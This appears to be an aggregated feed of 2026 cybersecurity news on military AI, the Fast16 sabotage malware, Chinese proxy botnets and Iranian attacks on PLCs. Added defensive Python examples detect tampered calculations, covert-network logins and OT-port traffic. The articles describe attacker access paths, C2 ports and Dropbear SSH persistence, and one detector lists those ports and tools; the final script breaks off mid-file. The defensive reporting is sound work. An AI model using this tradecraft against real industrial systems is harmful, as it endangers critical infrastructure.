
AI, Cyberwarfare, and Autonomous Weapons: Inside America’s New Military Strategy

8 May 2026, 04:31

The Pentagon is integrating AI into military operations, transforming cybersecurity, targeting, and command systems into a unified warfare architecture.

May 2026 marks a turning point in the evolution of modern warfare: the convergence of artificial intelligence, cybersecurity, and conventional military power is no longer theoretical. It is becoming an operational reality.

The Pentagon has signed agreements with major technology companies, including OpenAI, Google, Microsoft, Amazon, and SpaceX to integrate advanced AI models into classified military networks. The stated goal is clear: transform the United States into an “AI-first” military force capable of maintaining decision superiority across every battlefield domain.

Under this strategy, AI is no longer treated as a laboratory tool or analytical assistant. It is moving directly into the military chain of command, intelligence analysis, logistics, targeting, and operational planning. More than 1.3 million Department of Defense employees are already using the GenAI.mil platform, dramatically reducing processes that once took months to just days.

The Pentagon’s doctrine reflects a major cultural shift: code and combat are no longer separate domains. Cybersecurity itself is now considered a combat capability. The ability to deploy, secure, update, and operate AI models inside classified environments has become part of national defense infrastructure.

The contracts signed with technology providers include “lawful operational use” clauses, requiring vendors to accept any use considered legitimate by the Pentagon, including autonomous weapons systems and intelligence operations. This raises profound ethical and geopolitical questions.

At the same time, the U.S. military is pushing for deep integration across defense systems. Through the Army’s new “Right to Integrate” initiative, manufacturers of missiles, drones, radars, and sensors are being asked to open their software interfaces so AI agents can connect systems in real time. The inspiration comes largely from Ukraine, where open APIs allowed rapid battlefield integration between drones, sensors, and fire-control systems.

However, this transformation creates a dangerous paradox: the same openness that enables speed and flexibility also expands the attack surface. Every API, cloud platform, and AI integration point can potentially become an entry point for sophisticated adversaries such as China, Russia, or state-sponsored APT groups.

A compromised AI-enabled military ecosystem could allow attackers to inject false sensor data, manipulate targeting systems, degrade drone communications, study operational decision patterns, or even hijack autonomous weapons platforms. In this context, software vulnerabilities and supply-chain weaknesses are no longer merely IT problems: they become military objectives.

Washington is also increasingly concerned about the cyber risks posed by advanced AI models themselves. According to reports, the White House is considering new oversight mechanisms for frontier AI systems capable of autonomously discovering software vulnerabilities or automating cyberattacks at scale. Officials fear that uncontrolled deployment of such models could lead to mass exploitation of critical infrastructure, financial systems, or global supply chains.

The strategic implications extend beyond military technology. Major cloud providers such as Amazon, Microsoft, and Google are gradually becoming part of the American defense architecture. Civilian digital infrastructure is evolving into a structural extension of military power.

This raises difficult questions for Europe and Italy. In a world where most cloud, AI, and cybersecurity infrastructures are controlled by American companies, what does technological sovereignty really mean? Sovereignty is no longer just about producing chips or funding startups. It is about controlling the digital infrastructure that supports national defense, determining who can update AI systems operating on classified networks, and deciding who sets the operational rules of software during crises.

The United States, Israel, and China are already integrating AI into military doctrine at high speed. Europe risks remaining trapped between regulation and technological dependence unless it develops its own industrial capabilities, operational autonomy, and independent evaluation frameworks.

The message coming from Washington is unmistakable: the future of strategic power will depend on who controls AI models, data, interfaces, and software-driven operational systems. In modern warfare, software has become a battlefield domain, and the speed of code deployment increasingly matters as much as firepower itself.

A more detailed analysis is available in Italian here.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, AI)

16-30 April 2026 Cyber Attacks Timeline

Paolo Passeri (HACKMAGEDDON), 8 May 2026, 07:04

In the second timeline of April 2026 I collected 108 events, corresponding to an average of 7.2 events per day, a number that confirms a growing trend, driven by the increasing number of supply chain attacks, compared to the previous timeline, where I collected 94 events (6.27 events/day).

Q1 2026 Cyber Attack Statistics

Paolo Passeri (HACKMAGEDDON), 28 April 2026, 06:51

I aggregated the statistics created from the cyber attacks timelines published in the first quarter of 2026. In this period, I collected a total of 528 events (5.87 events/day) dominated by Cyber Crime with 66%, followed by Cyber Espionage with 18%, Hacktivism with 3%, and finally Cyber Warfare with 2%.


Fast16: Pre-Stuxnet malware that targeted precision engineering software

27 April 2026, 05:48

Fast16 is a pre-Stuxnet malware that tampered with precision software and spread itself. Evidence suggests links to U.S. operations during early cyber tensions.

SentinelOne uncovered Fast16, a sabotage malware used in 2005, years before Stuxnet. The malicious code is written in Lua and targeted high-precision calculation software, altering results and spreading across systems. The malware appeared in the ShadowBrokers leak of NSA tools, and evidence suggests it may have been developed by the United States, highlighting early cyber operations linked to tensions with Iran.

Researchers traced early advanced malware design by searching for the first use of embedded Lua engines, a feature later seen in tools like Flame and Project Sauron. Lua enables modular, flexible malware without recompilation. The analysis led to a 2005 sample, svcmgmt.exe, which contained an embedded Lua VM and encrypted bytecode. Though it looked like a simple service binary, deeper analysis revealed a sophisticated implant with encryption, Windows API access, and modular design. A debug path linked it to the fast16.sys driver, tying it to the early Fast16 framework.

The carrier svcmgmt.exe acts as a modular loader, using encrypted Lua payloads and “wormlets” to spread across Windows systems via network shares, while avoiding detection by checking for security tools. It can also deploy the kernel driver for deeper control.

The fast16.sys driver loads at boot and intercepts filesystem operations, modifying executable files in memory. It targets specific programs, especially precision calculation software compiled with Intel tools, and applies rule-based patches that subtly alter results using floating-point manipulation.

“The FPU patch in fast16.sys was written to corrupt these routines in a controlled way, producing alternative outputs. This moves fast16 out of the realm of generic espionage tooling and into the category of strategic sabotage.” continues the report. “By introducing small but systematic errors into physical‑world calculations, the framework could undermine or slow scientific research programs, degrade engineered systems over time or even contribute to catastrophic damage.”

This suggests a sabotage goal rather than simple espionage, aiming to corrupt scientific or engineering outputs while remaining stealthy and persistent across infected systems.

“A sabotage operation of this kind would be foiled by verifying calculations on a separate system. In an environment where multiple systems shared the same network and security posture, the wormable carrier would deploy the malicious driver module to those systems as well, reducing the chance that an independent calculation would diverge from the corrupted output.” reads the report published by SentinelOne. “At this time, we’ve been unable to identify all of the target binaries in order to understand the nature of the intended sabotage.”

Fast16 most likely targeted high-precision engineering and simulation software used in the mid-2000s, based on pattern matching of its patching rules. The strongest candidates include LS-DYNA 970 (used for crash, explosion, and structural simulations, including sensitive defense-related research), PKPM (a widely used Chinese structural design and seismic analysis suite), and MOHID (a hydrodynamic modeling platform for coastal and environmental simulations).

Analysis of compiler artifacts inside the malware suggests it came from an older, security-focused Unix engineering culture, with traces of SCCS/RCS versioning conventions unusual in Windows malware of that era. This points to a long-running, well-resourced development effort rather than opportunistic tooling.

The overall design of fast16 combines a Lua-based carrier, a kernel-level filesystem driver, and rule-based code patching. This structure enables controlled corruption of numerical outputs in specialized simulation software, potentially altering results in fields like structural engineering, physics modeling, and environmental analysis.
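The report's stated countermeasure, verifying a calculation on a separate system, can be built into an engineering workflow rather than left to chance. The Python block below is an added illustration written for this page, not code from the SentinelOne report or from the malware: it runs one formula (a beam-deflection calculation, chosen as a stand-in for the kind of structural routine fast16 targeted) through two deliberately different arithmetic paths, binary floating point and exact rational arithmetic, and flags any divergence above a tolerance. The "sabotaged" variant that injects a 0.1 % bias is a constructed stand-in for a patched FPU routine; the report does not publish fast16's actual patching rule, and the function names and inputs are this example's own.

```python
from fractions import Fraction
from typing import Callable, Sequence, Tuple


def beam_deflection(w: float, L: float, E: float, I: float) -> float:
    """Maximum deflection of a simply supported beam under a uniform load,
    delta = 5 w L^4 / (384 E I), computed in ordinary binary floating point.
    This is the path a fast16-style FPU patch would corrupt."""
    return 5.0 * w * L ** 4 / (384.0 * E * I)


def beam_deflection_exact(w: float, L: float, E: float, I: float) -> Fraction:
    """The same formula in exact rational arithmetic: a deliberately different
    code path (no FPU instructions), used here as the independent reference."""
    fw, fL, fE, fI = (Fraction(str(x)) for x in (w, L, E, I))
    return Fraction(5) * fw * fL ** 4 / (Fraction(384) * fE * fI)


def sabotaged_deflection(w: float, L: float, E: float, I: float) -> float:
    """Constructed stand-in for a sabotaged routine: a 0.1 % systematic bias,
    small enough to pass eyeballing. This is NOT the fast16 patching rule."""
    return beam_deflection(w, L, E, I) * (1.0 - 1e-3)


def cross_check(primary: Callable[..., float], reference: Callable[..., Fraction],
                args: Sequence[float], rel_tol: float = 1e-9) -> Tuple[bool, float, float]:
    """Run both implementations and compare them.

    Returns (ok, primary_value, relative_error). Fraction(float) converts the
    binary result exactly, so the comparison adds no rounding of its own; the
    tolerance only has to absorb the float path's own round-off (~1e-16 here)."""
    p = primary(*args)
    r = reference(*args)
    err = abs(Fraction(p) - r) / abs(r) if r != 0 else abs(Fraction(p))
    return err <= rel_tol, p, float(err)


if __name__ == "__main__":
    # constructed inputs: w [N/m], L [m], E [Pa], I [m^4]
    args = (10.0, 4.0, 2.0e11, 1.0e-5)
    for fn in (beam_deflection, sabotaged_deflection):
        ok, value, err = cross_check(fn, beam_deflection_exact, args)
        print(f"{fn.__name__:22s} value={value:.6e} rel_err={err:.1e} {'OK' if ok else 'MISMATCH'}")
```

The comparison only helps if the reference path really is independent. The report notes that the wormable carrier deployed the driver to every machine sharing the same network and security posture, so the second run belongs on a host with a different build, outside the shared security domain, or in a different arithmetic as here; two identically patched machines will agree with each other and both be wrong.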

“This 2005 attack is a harbinger for sabotage operations targeting ultra expensive high-precision computing workloads of national importance like advanced physics, cryptographic, and nuclear research workloads.” concludes the report. “fast16 predates Stuxnet by at least five years, and stands as the first operation of its kind. The use of an embedded customized Lua virtual machine predates the earliest Flame samples by three years.”


Pierluigi Paganini

(SecurityAffairs – hacking, malware)

China-linked threat actors use consumer device botnets to evade detection, warn UK and partners

24 April 2026, 03:58

UK National Cyber Security Centre (NCSC) warns China-linked hackers use hijacked devices as proxy networks to hide activity and evade detection.

UK National Cyber Security Centre (NCSC) and global partners warn that China-linked threat actors now rely on large proxy networks built of hacked consumer devices. Groups control routers, cameras, video recorders, and NAS systems to route attacks and mask their identity. This shift replaces smaller, dedicated infrastructure with vast botnets that help them blend into normal traffic and avoid detection.

China-nexus cyber actors use these botnets across the full Cyber Kill Chain, from reconnaissance to data theft. This model gives them a low-cost, flexible, and deniable setup that they can quickly reshape, making static IP blocklists far less effective.

“Covert networks enable China-nexus actors to launch cyber attacks against UK organisations, stealing sensitive data and potentially disrupting critical services. Because the covert networks are constantly refreshed and share nodes across multiple threat groups, defenders face “IOC extinction” – indicators of compromise disappear as quickly as they are discovered.” reads the advisory. “Consequently, organisations that rely solely on static defences risk being bypassed, while those that adopt adaptive, intelligence driven measures can better mitigate the risk.”

National Cyber Security Centre and partners, including the Cyber League, released guidance to counter covert network threats. They advise organisations of all sizes to map and baseline traffic from edge devices, especially VPN and remote access connections. They also recommend using dynamic threat feed filtering that includes indicators of compromised infrastructure to improve detection and reduce exposure to hidden attack networks.

“Potential victims should implement two-factor authentication for remote access and, where possible, apply zero trust controls, IP allow lists, and machine certificate verification.” continues the advisory. “Larger or high-risk entities should consider active hunting of suspicious SOHO/IOT traffic, geographic profiling, and machine learning based anomaly detection.”

National Cyber Security Centre explains that China-linked covert networks keep evolving, with new and updated infrastructures appearing regularly due to countermeasures, exploits, and technical changes.

“The number of covert networks used by China-nexus cyber actors is large, with new networks regularly developed and deployed.” reads the joint advisory. “The existing covert networks change too, either because of defensive or legal action, or simply as a result of software updates and new exploits being used to target different technologies for incorporation into the network.”

Because these networks change so often, full technical descriptions quickly become outdated and offer limited value for defenders. Still, most share a common structure: an operator enters through an on-ramp or entry node, then routes traffic across multiple compromised devices acting as traversal nodes, before exiting through an exit node that often sits near the target’s region. Understanding this basic flow helps defenders identify where they sit in the chain and improve detection and response strategies against these dynamic proxy-based networks.


NCSC provides tailored guidance to defend against covert networks built from compromised devices. It explains that defending against these attacks requires layered strategies matched to an organisation's size and risk level, and that no combination of them eliminates all risk.

All organisations should map internet-facing assets, baseline normal traffic, especially VPN and remote connections, and use dynamic threat feeds that include covert infrastructure indicators. They should also deploy multi-factor authentication and consider tools like the Cyber Action Toolkit and Cyber Essentials.

Higher-risk organisations should strengthen controls with IP allow lists, geographic and behavioural filtering, zero trust models, SSL machine certificates, and reduced internet exposure. They should also explore anomaly detection using machine learning.

The largest or most exposed organisations should actively hunt for signs of covert networks, track known infrastructure using threat intelligence, analyse NetFlow data, and integrate dynamic blocklists and alerts. For critical sectors, the Cyber Assessment Framework supports advanced defensive maturity.
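The guidance above (baseline remote-access traffic, feed dynamic indicators of covert infrastructure, hunt in NetFlow) reduces to a small amount of detection logic. The Python block below is an added example written for this page, not an NCSC tool: it runs over a handful of constructed VPN authentication events, matches source addresses against a constructed covert-network feed whose entries expire by last-seen date (the advisory's "IOC extinction" is the argument for this kind of dynamic filtering rather than a static blocklist), and flags successful logins from a country outside each account's baseline. The log format, the feed, the documentation-range IP addresses (192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24) and the reserved ASNs are all assumptions made for the example.

```python
import ipaddress
from datetime import datetime, timedelta
from typing import Dict, List, Set, Tuple

# Constructed covert-network feed (documentation address ranges, not real IOCs).
# Each entry carries the time the node was last seen active so the matcher can
# expire it: yesterday's exit node is often a clean home router today, and a
# static blocklist both misses new nodes and keeps blocking old ones.
COVERT_FEED = [
    ("203.0.113.0/24", "2026-04-23T00:00:00"),   # recently active traversal/exit nodes
    ("198.51.100.7/32", "2026-03-01T00:00:00"),  # last seen seven weeks ago (stale)
]

# Constructed VPN authentication events in a key=value format chosen for this example.
SAMPLE_LOG = """\
2026-04-24T08:01:10 vpn-auth user=alice src=192.0.2.15 geo=GB asn=AS64496 result=success
2026-04-24T08:03:42 vpn-auth user=alice src=203.0.113.44 geo=GB asn=AS64500 result=success
2026-04-24T08:05:00 vpn-auth user=bob src=198.51.100.7 geo=GB asn=AS64501 result=success
2026-04-24T08:07:15 vpn-auth user=bob src=192.0.2.200 geo=BR asn=AS64502 result=success
2026-04-24T08:09:30 vpn-auth user=carol src=203.0.113.9 geo=GB asn=AS64500 result=failure
"""

# Constructed baseline: the countries each account normally authenticates from,
# learned from an earlier window of successful logins.
BASELINE: Dict[str, Set[str]] = {"alice": {"GB"}, "bob": {"GB"}, "carol": {"GB"}}


def parse_event(line: str) -> Dict[str, str]:
    """Parse one 'timestamp source key=value ...' line into a dict."""
    ts, source, *fields = line.split()
    event = {"ts": ts, "source": source}
    for field in fields:
        key, _, value = field.partition("=")
        event[key] = value
    return event


def active_feed(feed, as_of: datetime, max_age: timedelta = timedelta(days=14)) -> List[ipaddress.IPv4Network]:
    """Keep only feed entries seen within max_age of as_of (the dynamic part)."""
    return [
        ipaddress.ip_network(cidr)
        for cidr, last_seen in feed
        if as_of - datetime.fromisoformat(last_seen) <= max_age
    ]


def detect(log: str, feed, baseline: Dict[str, Set[str]], as_of: datetime) -> List[Tuple[str, str, str, str]]:
    """Return (timestamp, user, src, reason) for each suspicious authentication.

    A feed hit is reported for failed logins too: credential guessing through an
    exit node near the target's region is exactly the traffic to hunt for."""
    networks = active_feed(feed, as_of)
    alerts = []
    for line in log.splitlines():
        ev = parse_event(line)
        src = ipaddress.ip_address(ev["src"])
        if any(src in net for net in networks):
            alerts.append((ev["ts"], ev["user"], ev["src"], "source on active covert-network feed"))
        if ev["result"] == "success" and ev["geo"] not in baseline.get(ev["user"], set()):
            alerts.append((ev["ts"], ev["user"], ev["src"], f"successful login from unbaselined country {ev['geo']}"))
    return alerts


def run_sample(as_of: str = "2026-04-24T09:00:00") -> List[Tuple[str, str, str, str]]:
    """Run the detector over the constructed log as of the given time."""
    return detect(SAMPLE_LOG, COVERT_FEED, BASELINE, datetime.fromisoformat(as_of))


if __name__ == "__main__":
    for alert in run_sample():
        print(*alert, sep="  ")
```

The stale entry for 198.51.100.7 produces no alert, which is the intended behaviour: the advisory's point is that nodes churn, so indicators need a freshness window and a feed that is refreshed, not a list that grows forever. Geographic baselining catches the case the feed does not yet know about, at the cost of false positives for genuinely travelling users, which is why the two checks are reported with separate reasons.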

Federal Bureau of Investigation reports describe large China-linked botnets, such as Raptor Train, used for state-aligned cyber activity. In September 2024, researchers from Lumen’s Black Lotus Labs discovered the Raptor Train botnet, composed of small office/home office (SOHO) and IoT devices. The experts believe the botnet is controlled by the China-linked APT group Flax Typhoon (also called Ethereal Panda or RedJuliett). The botnet has been active since at least May 2020, reaching its peak with 60,000 compromised devices in June 2023.

Since May 2020, over 200,000 devices, including SOHO routers, NVR/DVR devices, NAS servers, and IP cameras, have been compromised and added to the Raptor Train botnet, making it one of the largest China-linked IoT botnets discovered. 


Pierluigi Paganini

(SecurityAffairs – hacking, China)

1-15 April 2026 Cyber Attacks Timeline

Paolo Passeri (HACKMAGEDDON), 24 April 2026, 05:39

The first timeline of April 2026 brings an evolution in terms of methodology: from now on I will map the initial access techniques with the MITRE ATT&CK model. I also decided to merge the categories of Finance and Fintech in the sectors chart. From an event perspective, the first half of April 2026 confirmed a sustained trend...


Sweden reports cyberattack attempt on heating plant amid rising energy threats

16 April 2026, 04:26

Sweden says a pro-Russian group attacked a heating plant in 2025. The failed cyberattack highlights growing threats to Europe’s energy infrastructure.

Sweden has blamed a pro-Russian group linked to Russian intelligence for a failed cyberattack on a heating plant in 2025. Officials say the incident is part of a broader wave of attacks targeting critical infrastructure across Europe. Similar operations have been reported in Poland, affecting energy systems serving hundreds of thousands of people, raising concerns over escalating cyber threats tied to Russia.

Sweden has publicly confirmed for the first time a failed cyberattack on a heating plant in the west, according to Civil Defense Minister Carl-Oskar Bohlin. The Minister linked the incident to a wave of similar attacks that targeted Poland, where energy facilities serving 500,000 people were hit, with evidence pointing to Russian-linked hackers.

“The attacks are among more than 150 incidents of sabotage and malign activity across Europe tracked by The Associated Press and linked to Russia by Western officials since Moscow’s full-scale invasion of Ukraine in February 2022.” reads the report published by the Associated Press. “Officials say a goal of the attacks is to undermine support for Ukraine, spread fear and discord in European societies and drain investigative resources.”

Cyberattacks linked to Russia have increasingly targeted European countries and their critical infrastructure, often seen as retaliation for support to Ukraine. Energy grids, water systems, and transport networks have been disrupted or probed in coordinated campaigns. These operations combine cyber sabotage, espionage, and influence tactics, aiming to create instability and test resilience. While often limited in immediate impact, they signal a broader strategy of hybrid warfare, where digital attacks complement geopolitical pressure across Europe.

The Kremlin has denied any role in sabotage across Europe, despite multiple incidents blamed on pro-Russian actors. In 2024, cyberattacks in Denmark disrupted a water utility, leaving homes without supply. Norwegian authorities reported hackers remotely opening a dam valve, while Latvia linked arson attacks on rail infrastructure to individuals acting in Russia’s interests, highlighting a pattern of hybrid threats.


Pierluigi Paganini

(SecurityAffairs – hacking, Sweden)

March 2026 Cyber Attacks Statistics

Paolo Passeri (HACKMAGEDDON), 16 April 2026, 05:14

After the cyber attacks timelines, it’s time to publish the statistics for March 2026 where I collected and analyzed 282 events: a sharp increase compared to the 176 events of the previous month. In March 2026, Cyber Crime continued to lead the Motivations chart with 64%, ahead of Cyber Espionage at number two with 15%. Hacktivism took over the third position with 6%, ahead of Cyber Warfare with 3%.

16-31 March 2026 Cyber Attacks Timeline

Paolo Passeri (HACKMAGEDDON), 14 April 2026, 08:57

The second half of March 2026 has been very active from an infosec standpoint, with 124 events and a threat landscape dominated by malware. As always, cyber crime led the motivations chart with 65%, slightly up from the previous timeline.


Iran-linked group Handala claims to have breached three major UAE organizations

13 April 2026, 06:00

Iran-linked group Handala claims to have breached three major UAE organizations: Dubai Courts, Dubai Land Department, and Dubai Roads & Transport Authority.

The group Handala claimed a major cyberattack against the UAE, targeting Dubai Courts Department, Dubai Land Department, and Dubai Roads and Transport Authority.

They alleged destroying 6 petabytes of data and stealing 149 TB of sensitive information, framing the attack as retaliation and a warning to regional governments, though such claims remain unverified.

“In response to the blatant betrayal of the Resistance Axis by the Epsteinist leaders of the UAE, and as a serious, preemptive warning to all treacherous governments in the region, Handala has launched one of its most powerful cyberattacks against the country’s critical infrastructure.” the group wrote on its Tor website. “During this operation, 6 petabytes of data have been completely destroyed…”


Handala appears as a pro-Palestinian hacktivist group but is widely seen as a front for Iran-backed Void Manticore. Known for phishing, data theft, extortion, and destructive wiper attacks, they also engage in info operations and psychological warfare. Since the Iran conflict began, they’ve targeted Israeli military servers, intelligence officers, and companies, stealing or wiping data.

In early April, the group announced that it breached PSK Wind Technologies, an Israeli engineering and IT firm specializing in integrated systems for defense and critical communications, including command and control solutions.

Since the U.S.-Israeli war with Iran began in February, the Iran-linked group Handala has intensified its cyberattacks. It claimed responsibility for a destructive breach at medical tech firm Stryker that targeted its internal Microsoft environment and remotely wiped tens of thousands of employee devices without using malware. 

The group claimed it wiped more than 200,000 servers, mobile devices, and other systems, forcing the company to shut down offices across 79 countries. The hacktivists also claimed they exfiltrated about 50TB of corporate data from the company’s infrastructure.

Recently, the Iran-linked hacking group Handala claimed the hack of the FBI Director Kash Patel’s personal Gmail account and shared alleged data, including photos and files.

The FBI is offering up to $10 million for information on the Handala hackers.


Pierluigi Paganini

(SecurityAffairs – hacking, Handala)

Iran Crisis Highlights Rising Gulf Cybersecurity Risks to Critical Infrastructure


The Persian Gulf is a strategically sensitive region because of its energy reserves, maritime trade routes, and ongoing geopolitical rivalries. The recent escalation involving Iran and its regional adversaries has reinforced instability and made Gulf cybersecurity as relevant as the traditional security concerns. The spread of missile systems, drones, and cyber capabilities has increased the likelihood that a conflict will affect both physical infrastructure and digital systems, which is why cybersecurity now sits inside the region's security frameworks.

Iran Crisis and Gulf Infrastructure Risks

The Iran crisis has shown that Gulf states are directly exposed to regional conflicts. Critical infrastructure such as ports, energy facilities, desalination plants, and financial hubs has become vulnerable to disruption. This has raised the profile of cybersecurity in Gulf planning, as states focus on protecting both the operational technology and the IT systems that support essential services. For the UAE, this exposure has reinforced the need to secure economic and strategic assets against both kinetic and cyber threats. As a result, cybersecurity is now integrated into the national security strategies of the region's states.

RSCT and Regional Cyber Interdependence

Regional Security Complex Theory (RSCT), developed by Barry Buzan and Ole Wæver, holds that security threats in the Gulf are interlinked: instability in one state affects the others. The Iran crisis reflects this dynamic, where missile strikes, drone operations, and cyber activity can rapidly influence regional stability. Within this structure, Gulf cybersecurity is interdependent as well. A cyberattack on energy or financial infrastructure in one Gulf state can affect supply chains, markets, and maritime operations across the region, which makes cybersecurity a shared regional issue rather than a purely national concern.

UAE Military Modernization and Cyber Defense Posture

The UAE has expanded its defense capabilities, strengthened strategic partnerships, and engaged in regional security initiatives. It has also adopted a defensive posture relying on systems such as THAAD and Patriot to intercept incoming missiles. Alongside missile defense, cyber resilience has become a national defense priority. The increasing use of drones, cyber operations, and long-range missiles has required the integration of cyber defense with conventional military systems, part of a broader adaptation to hybrid warfare across the Middle East.

Economic Security, the Strait of Hormuz, and Gulf Cyber Exposure

The Iran crisis has reinforced the link between economic and national security in the Gulf. The Strait of Hormuz remains a critical chokepoint for global energy transport, and disruptions there have direct effects on trade and supply chains. Cities such as Dubai and Abu Dhabi function as major global economic hubs, so any disruption to their ports, energy systems, or financial infrastructure, whether physical or cyber, can have international consequences. This has increased the focus on Gulf cybersecurity as a matter of economic continuity and system resilience.

Gulf Cooperation Council (GCC) states have discussed deeper security integration, including coordinated air defense systems, intelligence sharing, and maritime security cooperation. These initiatives aim to reduce reliance on external security guarantees while improving regional response capacity.

At the same time, states are diversifying partnerships beyond traditional allies. Cooperation with countries such as Pakistan, as well as with European and Asian partners, reflects strategic hedging. This diversification extends to cybersecurity, where Gulf states seek broader cooperation on digital threats and intelligence exchange.

U.S. agencies alert: Iran-linked actors target critical infrastructure PLCs

8 April 2026, 04:46

U.S. agencies warn Iran-linked threat actors are targeting internet-exposed PLCs used in critical infrastructure networks.

U.S. agencies, including the FBI and CISA, warn that Iran-linked hackers are targeting internet-exposed Rockwell/Allen-Bradley PLCs used in critical infrastructure. The agencies published a joint advisory involving multiple federal organizations.

“Iran-affiliated advanced persistent threat (APT) actors are conducting exploitation activity targeting internet-facing operational technology (OT) devices, including programmable logic controllers (PLCs) manufactured by Rockwell Automation/Allen-Bradley.” reads the joint advisory. “This activity has led to PLC disruptions across several U.S. critical infrastructure sectors through malicious interactions with the project file and manipulation of data on human machine interface (HMI) and supervisory control and data acquisition (SCADA) displays, resulting in operational disruption and financial loss.”

Threat actors are carrying out cyberattacks targeting internet-connected operational technology (OT) across multiple critical infrastructure sectors. Iran-linked actors are believed to be behind the activity, aiming to cause disruption in areas such as government services, water systems, and energy.

The attacks involve manipulating project files and altering data shown on HMI and SCADA systems, leading in some cases to operational disruptions and financial losses. Authorities urge organizations to review indicators of compromise and apply mitigations to reduce risks. The campaign has been linked to groups like CyberAv3ngers, associated with Iran’s IRGC.

Organizations are advised to assess exposed devices, follow security guidance from vendors, disconnect systems from the internet where possible, and coordinate with authorities for incident response and mitigation support.

“The FBI assesses a group of Iranian-affiliated APT actors are targeting internet-exposed PLCs with the intent to cause disruptions—including maliciously interacting with project files, and manipulating data displayed on HMI and SCADA displays—to U.S. critical infrastructure organizations.” continues the alert. “Iranian-affiliated APT targeting campaigns against U.S. organizations have recently escalated, likely in response to hostilities between Iran, and the United States and Israel.”

During a campaign starting in November 2023, IRGC-linked hackers known as CyberAv3ngers targeted U.S. PLCs and HMIs, disrupting operations. Also tracked under multiple names, the group compromised at least 75 devices, including Unitronics PLCs used across sectors like water and wastewater systems.

“During a similar campaign beginning in November 2023, the IRGC CEC-affiliated cyber threat actors known as “CyberAv3ngers” targeted U.S.-based PLCs and HMIs, causing disruptive effects. Private industry and open sources also refer to this group as Hydro Kitten, Storm-0784, APT Iran, Bauxite, Mr. Soul, Soldiers of Solomon, UNC5691, and the Shahid Kaveh Group. These attacks compromised at least 75 devices, targeting U.S.-based Unitronics PLC devices with an HMI used across multiple critical infrastructure sectors, including WWS.”

According to the joint advisory, Iran-linked actors gained initial access to internet-facing Rockwell/Allen-Bradley PLCs using overseas IPs and leased infrastructure, leveraging tools like Studio 5000 Logix Designer. They targeted devices such as CompactLogix and Micro850. For command and control, attackers used ports including 44818, 2222, 102, 22, and 502, and deployed SSH tools like Dropbear for remote access. Activity suggests possible targeting of other vendors, including Siemens PLCs. The attacks enabled the extraction of project files and manipulation of data on HMI and SCADA systems, causing disruption.

Government experts recommend disconnecting PLCs from the internet or protecting them with a firewall, monitoring OT ports for suspicious traffic, scanning logs for indicators of compromise, enabling multifactor authentication, updating firmware, disabling unused services or default keys, and continuously monitoring network activity.

In mid-March, the EU sanctioned Chinese and Iranian firms and individuals for cyberattacks targeting critical infrastructure and over 65,000 devices across member states.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, Iran)

  • ✇Firewall Daily – The Cyber Express
  • Iran-Linked Hackers Breach U.S. Industrial Systems, Trigger Disruptions Samiksha Jain

Iran-Linked Hackers Breach U.S. Industrial Systems, Trigger Disruptions

Iranian-affiliated APT targeting PLCs

A new U.S. government advisory has raised fresh concerns over Iranian-affiliated APT targeting PLCs, warning that cyberattacks are now moving beyond data theft into direct disruption of industrial systems. Issued on April 7, 2026, the joint alert from the FBI, CISA, NSA and other agencies confirms that Iran-linked threat actors are actively exploiting internet-facing programmable logic controllers (PLCs), with incidents already impacting multiple critical infrastructure sectors. This is not a theoretical threat. According to the advisory, several organizations have experienced operational disruptions and even financial losses after attackers interfered with industrial processes.

From Network Access to Operational Disruption

What makes this campaign stand out is its intent. The Iranian-affiliated APT activity targeting PLCs is not focused on espionage; it is designed to disrupt. Attackers have been manipulating PLC project files and altering data displayed on human machine interface (HMI) and supervisory control and data acquisition (SCADA) systems. In practice, this means operators could be relying on inaccurate data while underlying processes are being changed in real time. The affected sectors include government services, water and wastewater systems, and energy, areas where even minor disruptions can have significant downstream impact.

Image: Iranian-affiliated APT targeting PLCs (Image Source: FBI)

How the Attacks Are Carried Out

The entry point is often simple: internet exposure. The advisory notes that attackers are scanning for publicly accessible PLCs, particularly models such as CompactLogix and Micro850, and connecting to them using legitimate engineering tools like Studio 5000 Logix Designer. Once inside, the activity becomes more deliberate. Threat actors extract configuration files, modify logic, and establish persistence. In some cases, they deploy tools like Dropbear SSH to maintain remote access through port 22. The attacks rely on commonly used industrial communication ports, including 44818, 2222, 102, 22, and 502, allowing malicious traffic to blend in with normal OT operations. Investigators also observed the use of overseas IP addresses and leased third-party infrastructure, suggesting a coordinated and sustained effort rather than opportunistic scanning.

A Campaign That Has Been Building Over Time

The current activity is not happening in isolation. U.S. agencies link it to earlier Iran-aligned operations, including campaigns attributed to the CyberAv3ngers group that targeted PLCs in 2023. What has changed is the persistence. The latest advisory tracks activity spanning from at least January 2025 through March 2026, with ongoing incidents reported as recently as March. Officials suggest the escalation may be tied to broader geopolitical tensions, but the technical pattern is clear: industrial control systems are becoming a repeated target.

Exposure and Weak OT Security

The Iranian-affiliated APT campaign targeting PLCs exposes a long-standing weakness in critical infrastructure: too many industrial devices remain directly accessible from the internet. In many cases, attackers did not need sophisticated exploits. They gained access because systems lacked basic protections like network segmentation, strong authentication, or restricted remote access. The result is a dangerous scenario where adversaries can move from initial access to operational control with relatively little resistance.

What Organizations Are Being Urged to Do

The advisory calls for immediate action, starting with visibility. Organizations are urged to review logs for suspicious traffic, especially connections originating from overseas infrastructure, and check for unusual activity on key OT ports. More broadly, the guidance reinforces a set of practical steps: removing PLCs from direct internet exposure, routing access through secure gateways, enabling stronger authentication controls, and maintaining offline backups of PLC logic and configurations. In some cases, even operational settings matter, such as ensuring controllers remain in “run” mode to prevent unauthorized remote changes.
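Both write-ups of the advisory above end with the same first step: look at connection logs for traffic to the listed OT ports from sources that should never reach a controller. The script below is an added example, not code from the advisory or either article; it assumes a constructed CSV flow format (timestamp,src_ip,dst_ip,dst_port,proto), an assumed engineering-workstation subnet as the only approved source, and sample addresses taken from documentation ranges.

```python
"""Flag connections to OT/PLC service ports from non-approved sources, and
surface the advisory's pattern of PLC-protocol access followed by SSH."""
import csv
import io
import ipaddress

# Ports named in the advisory, with the OT service usually found behind them.
OT_PORTS = {
    44818: "EtherNet/IP (CIP explicit messaging)",
    2222: "EtherNet/IP (CIP implicit I/O)",
    102: "ISO-TSAP (Siemens S7comm)",
    502: "Modbus/TCP",
    22: "SSH (e.g. a Dropbear service dropped on a PLC)",
}
PLC_PROTOCOL_PORTS = {44818, 2222, 102, 502}

# Assumption: only this engineering-workstation subnet may talk to PLCs.
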